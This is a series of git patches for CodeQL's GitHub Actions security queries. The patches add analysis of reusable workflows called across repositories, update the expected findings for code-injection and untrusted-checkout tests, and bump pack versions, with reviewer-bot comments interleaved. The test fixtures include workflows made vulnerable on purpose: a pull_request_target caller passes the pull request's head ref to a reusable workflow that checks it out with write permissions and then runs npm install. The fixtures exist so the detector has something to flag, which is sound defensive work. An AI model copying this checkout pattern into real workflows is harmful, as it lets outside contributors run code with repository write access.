 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 07221cd05bb6..8135237d6ce8 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.47
+version: 0.1.48
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 2048e94e7ec9..a40d58687899 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.47
+version: 0.1.48
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From d44e7aee0ad948eab1e703ffc8e53351cf077cb7 Mon Sep 17 00:00:00 2001
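Review bot: The second disjunct added in this hunk subsumes the first: for every offset where `indexOf("/.github/workflows") + 1` is defined, `indexOf(".github/workflows")` is defined at the same offset, so both `.suffix(...)` calls yield the same name and the `or` only contributes the case of a path with no leading slash. Keeping just the second branch, and dropping the commented-out `//result = ...` line added by the preceding hunk (@@ -98), would leave `result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath().suffix(this.(ReusableWorkflow).getLocation().getFile().getRelativePath().indexOf(".github/workflows"))`. Because `indexOf` yields every occurrence, a path that contains `.github/workflows` twice gives the callable several names; a comment stating that `getName()` is a suffix key consumed by `viableCallable` would either justify that or flag it. The enclosing `getName()` begins in the preceding hunk and its `else` branches continue beyond this one.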
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sun, 22 Sep 2024 22:05:39 +0200
Subject: [PATCH 518/707] Cross remote Reusable Workflow analysis
---
 ql/lib/codeql/actions/Helper.qll | 16 +++++++
 .../dataflow/internal/DataFlowPrivate.qll | 48 ++++++++++---------
 .../CWE-094/CodeInjectionCritical.expected | 6 +++
 .../CWE-094/CodeInjectionMedium.expected | 5 ++
 .../TestRepo/.github/workflows/reusable.yml | 29 +++++++++++
 .../.github/workflows/reusable_caller1.yaml | 11 +++++
 .../.github/workflows/reusable_caller2.yaml | 11 +++++
 .../.github/workflows/reusable_caller3.yaml | 11 +++++
 .../.github/workflows/reusable_local.yml | 29 +++++++++++
 .../UntrustedCheckoutCritical.expected | 4 ++
 10 files changed, 147 insertions(+), 23 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml
diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll
index 9ac67575b8b3..f6c31a6e8eab 100644
--- a/ql/lib/codeql/actions/Helper.qll
+++ b/ql/lib/codeql/actions/Helper.qll
@@ -252,10 +252,26 @@ predicate inPrivilegedExternallyTriggerableJob(AstNode node) {
 )
 }
+predicate calledByPrivilegedExternallyTriggerableJob(AstNode node) {
+ exists(ReusableWorkflow rw, ExternalJob caller, Job callee |
+ callee = node.getEnclosingJob() and
+ rw.getACaller() = caller and
+ rw.getAJob() = callee and
+ caller.isPrivilegedExternallyTriggerable()
+ )
+ or
+ exists(LocalJob caller |
+ caller = node.getEnclosingCompositeAction().getACallerJob() and
+ caller.isPrivilegedExternallyTriggerable()
+ )
+}
+
 predicate inPrivilegedContext(AstNode node) {
 inPrivilegedCompositeAction(node)
 or
 inPrivilegedExternallyTriggerableJob(node)
+ or
+ calledByPrivilegedExternallyTriggerableJob(node)
 }
 predicate inNonPrivilegedCompositeAction(AstNode node) {
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index 1159ccb53ae2..529bbc82087d 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -89,6 +89,23 @@ class DataFlowCall instanceof Cfg::Node {
 Location getLocation() { result = this.(Cfg::Node).getLocation() }
 }
+string getRepoRoot() {
+ exists(Workflow w |
+ w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and
+ result =
+ w.getLocation()
+ .getFile()
+ .getRelativePath()
+ .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and
+ // exclude workflow_enum reusable workflows directory root
+ not result.indexOf(".github/reusable_workflows/") > -1
+ or
+ not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and
+ not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and
+ result = ""
+ )
+}
+
 /**
 * A Cfg scope that can be called
 */
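Review bot: `calledByPrivilegedExternallyTriggerableJob` is added without a comment, and the over-approximation it introduces deserves one: the first disjunct marks every node of a reusable workflow as privileged as soon as any `ExternalJob` in `rw.getACaller()` is privileged and externally triggerable, and the second does the same for a composite action via `getACallerJob()`, regardless of which caller a particular flow path actually came through. For the queries that consume `inPrivilegedContext` that is the conservative direction, but it will add findings for shared workflows and actions that also have unprivileged callers, so the choice should be recorded. Suggested QLDoc: `/** Holds if node is inside a reusable workflow or composite action that has at least one privileged, externally triggerable caller; a single such caller is enough. */`.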
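Review bot: `getRepoRoot()` takes no argument but has one result per `Workflow`, so a database whose workflows sit under more than one directory yields several roots, and the `replaceAll(getRepoRoot(), "")` calls in `viableCallable` will then try each of them; if a single root is assumed that should be stated, and if several are intended the name should say so. The `w.getLocation().getFile().getRelativePath()` chain is repeated five times; binding it once, `exists(string p | p = w.getLocation().getFile().getRelativePath() | ...)`, would make the two branches easier to compare, and `indexOf(...) > -1` is just `exists(...indexOf(...))` since `indexOf` has no result without a match. Suggested QLDoc: `/** Gets the path prefix, up to and including the slash before .github/workflows, of each ordinary workflow in the database, or the empty string when workflows sit at the root; copies fetched into .github/reusable_workflows/ are skipped. */`.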
@@ -97,28 +114,7 @@ class DataFlowCallable instanceof Cfg::CfgScope {
 string getName() {
 if this instanceof ReusableWorkflow
- then
- //result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath()
- result =
- this.(ReusableWorkflow)
- .getLocation()
- .getFile()
- .getRelativePath()
- .suffix(this.(ReusableWorkflow)
- .getLocation()
- .getFile()
- .getRelativePath()
- .indexOf("/.github/workflows") + 1) or
- result =
- this.(ReusableWorkflow)
- .getLocation()
- .getFile()
- .getRelativePath()
- .suffix(this.(ReusableWorkflow)
- .getLocation()
- .getFile()
- .getRelativePath()
- .indexOf(".github/workflows"))
+ then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() // or
 else
 if this instanceof CompositeAction
 then
@@ -154,7 +150,13 @@ class NormalReturn extends ReturnKind, TNormalReturn {
 }
 /** Gets a viable implementation of the target of the given `Call`. */
-DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() }
+DataFlowCallable viableCallable(DataFlowCall c) {
+ c.getName() = result.getName() or
+ c.getName() = result.getName().replaceAll(getRepoRoot(), "") or
+ // special case for reusable workflows downloaded by the workflow_enum action
+ c.getName() =
+ result.getName().replaceAll(getRepoRoot(), "").replaceAll(".github/reusable_workflows/", "")
+}
 /**
 * Gets a node that can read the value returned from `call` with return kind
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 4123359b5514..9ebd55088024 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
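Review bot: The rewritten `then` line keeps a stray trailing `// or` comment, a remnant of the two-branch expression this hunk removes, which reads as an unfinished edit; drop it so the line ends at `.getRelativePath()`. With the suffix logic gone, `getName()` now returns the full relative path of a `ReusableWorkflow`, and the suffix matching moves into `viableCallable` in the next hunk; a one-line comment here, `// full relative path; viableCallable strips the repository root when matching calls`, would save the next reader the search. The enclosing `getName()` continues past the hunk's final `then`.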
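Review bot: The two new disjuncts in `viableCallable` resolve a call to any callable whose `getName()` matches once `getRepoRoot()` and `.github/reusable_workflows/` are stripped, so resolution is by path suffix alone: nothing ties the matched file to the `@ref` the caller pins, and two fetched repositories that share a relative workflow path both become targets. For a taint query that means a locally fetched copy of a remote reusable workflow is analysed as the callee even if it was checked out at a different revision than the one actually called, which can yield both missed and spurious paths; the caveat belongs next to the `workflow_enum` comment, e.g. `// Suffix match only: the fetched copy is assumed to be at the ref the caller pins; the ref itself is not checked`. When `getRepoRoot()` is the empty string, `replaceAll("", "")` presumably leaves the name unchanged and the second disjunct collapses into the first, which is worth a word as well.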
@@ -1,4 +1,5 @@ edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -29,6 +30,7 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -126,7 +128,9 @@ nodes | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -179,6 +183,7 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | 
@@ -385,6 +390,7 @@ subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index fa665b853884..c7d607f7c006 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -1,4 +1,5 @@ edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -29,6 +30,7 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -126,7 +128,9 @@ nodes | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -179,6 +183,7 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | diff --git a/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml b/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml new file mode 100644 index 000000000000..3b8a6d6dd62a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml new file mode 100644 index 000000000000..e53e55aff4ce 
--- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request_target: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml new file mode 100644 index 000000000000..50c0dd4901cd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml new file mode 100644 index 000000000000..1e7558b3bc08 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request: + +jobs: + check-execution-context: + uses: ./.github/workflows/reusable_local.yml + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml new file mode 100644 index 000000000000..3b8a6d6dd62a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml 
@@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 8bb9e02559c8..3db6902ad2f6 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,7 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | 
@@ -146,6 +147,7 @@ edges | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | | .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | 
@@ -205,6 +207,7 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | 
@@ -224,6 +227,7 @@ edges | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | From 1dd7c3d2ef75b8d45b1f5ec2f1cdaf3ba9cc6c27 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 22 Sep 2024 22:06:35 +0200 Subject: [PATCH 519/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8135237d6ce8..ec2e82dfe010 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.48 +version: 0.1.49 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a40d58687899..70f493e1d64b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.48 +version: 0.1.49 groups: [actions, queries] suites: codeql-suites extractor: javascript From df59e6f5d29e796702900795e4bb72daaf878bb9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 10:18:29 +0200 Subject: [PATCH 520/707] Consider a Reusable Workflow privileged if a caller is --- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 +- .../dataflow/internal/DataFlowPublic.qll | 2 +- ql/test/library-tests/test.expected | 1575 +---------------- .../CWE-094/CodeInjectionMedium.expected | 4 + .../TestRepo/.github/workflows/formal.yml | 70 + .../CWE-829/.github/workflows/formal.yml | 12 + .../UntrustedCheckoutCritical.expected | 2 + .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 8 files changed, 96 insertions(+), 1576 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2267c7ff694a..d0eb440d0d53 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
